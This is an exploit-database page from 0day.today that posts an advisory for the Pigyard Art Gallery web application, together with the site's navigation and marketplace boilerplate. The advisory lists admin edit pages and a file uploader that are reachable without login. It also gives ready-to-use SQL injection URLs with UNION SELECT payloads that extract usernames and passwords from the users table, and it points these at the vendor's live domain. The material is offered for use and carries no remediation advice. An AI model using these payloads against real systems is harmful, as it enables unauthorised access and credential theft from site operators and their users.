0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Pigyard Art Gallery Multiple Remote Vulnerabilities
=================================================== Pigyard Art Gallery Multiple Remote Vulnerabilities =================================================== ################################################################### Pigyard Art Gallery Multiple Remote Vulnerabilities Script Buy Now : http://www.pigyardgallery.com/how_to_buy.php author: ZoRLu not: msn i ekleyipte aptal aptal konusmayyn yok ben seni eklemedim sen beni ekledin vs. sorularynyz varsa sorarsynyz cins cins konu?acaksanyz eklemeyin. ################################################################## Pigyard Art Gallery not to login admin. but the edit config web site this exploit: Pictures Edit & Add: http://localhost/module.php?module=gallery&modPage=view_pictures example web sites: http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_pictures Availibility Edit & Add: http://localhost/module.php?module=gallery&modPage=view_availibilities example: http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_availibilities Exhibitions Edit & Add: http://localhost/module.php?module=gallery&modPage=view_exhibitions example: http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_exhibitions Genres Edit & Add: http://localhost/module.php?module=gallery&modPage=view_genres example: http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_genres Media Edit & Add: http://localhost/module.php?module=gallery&modPage=view_media example: http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_media Artist Edit & Add: http://localhost/module.php?module=gallery&modPage=view_artists example: http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_artists Empty Artists and Exhibitions Edit & Add: http://localhost/module.php?module=gallery&modPage=view_empty_picture_associates example: http://www.pigyardgallery.com/module.php?module=gallery&modPage=view_empty_picture_associates ######################################################################### File Upload: http://localhost/php/templates/file_uploader/file_selector.php example: http://www.pigyardgallery.com/php/templates/file_uploader/file_selector.php ####################################################################### SQL inj. exploit 1: http://loaclhost/module.php?module=gallery&modPage=show_pictures&artist=[SQL] exploit 2: http://loaclhost/module.php?module=gallery&modPage=show_pictures&exhibition=[SQL] exploit 3: http://loaclhost/module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=[SQL] example web site: http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_pictures&artist=[SQL] http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_pictures&exhibition=[SQL] http://www.pigyardgallery.com/module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=[SQL] example [SQL] : -1/**/union/**/select/**/0,1,2,3,4/* ( to me don't script available. so table name and columns name not find. but this to script sql inj available) ########################################################################## thanx: str0ke, FaLCaTa, aRKi, the_KaM!L, ReD_KaN, iSoMiX, edish, harded, z3h!r, KoDLoK(vur6un), siircicocuk, Dr.SaLTuK, kasIrga(lavrens), w3R3m avkidis, head_hunter and all users yildirimordulari.org O Simdi Komando: iSoMiX ( CanImsIn Kardesim, KanKam Benim :)) ) Efsane: YILDIRIMORDULARI.ORG ###################################################################### Added a default sql injection string by Aria-Security Team /str0ke Aria-Security Team, http://Aria-Security.net ------------------------------- Shout Outs: AurA, imm02tal, iM4N, Kinglet, Vendor: Pigyard Art Gallery Multiple SQL Injection This is a completation of the original advisory reported by ZoRLu @ Milw0rm (http://www.milw0rm.com/exploits/5181) Original Link: http://forum.aria-security.net/showthread.php?p=1474 module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-999999/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/* module.php?module=gallery&modPage=show_picture_full&artist=16&exhibition=&portfolio=module.php?module=gallery&modPage=show_picture_full&artist=&exhibition=&portfolio=true&sort=price&start=1&filterbyartist=&filterbygenre=-999999/**/union/**/select/**/username,password,0,0,0,0,0/**/from/**/users/* Regards, The-0utl4w # 0day.today [2024-12-24] #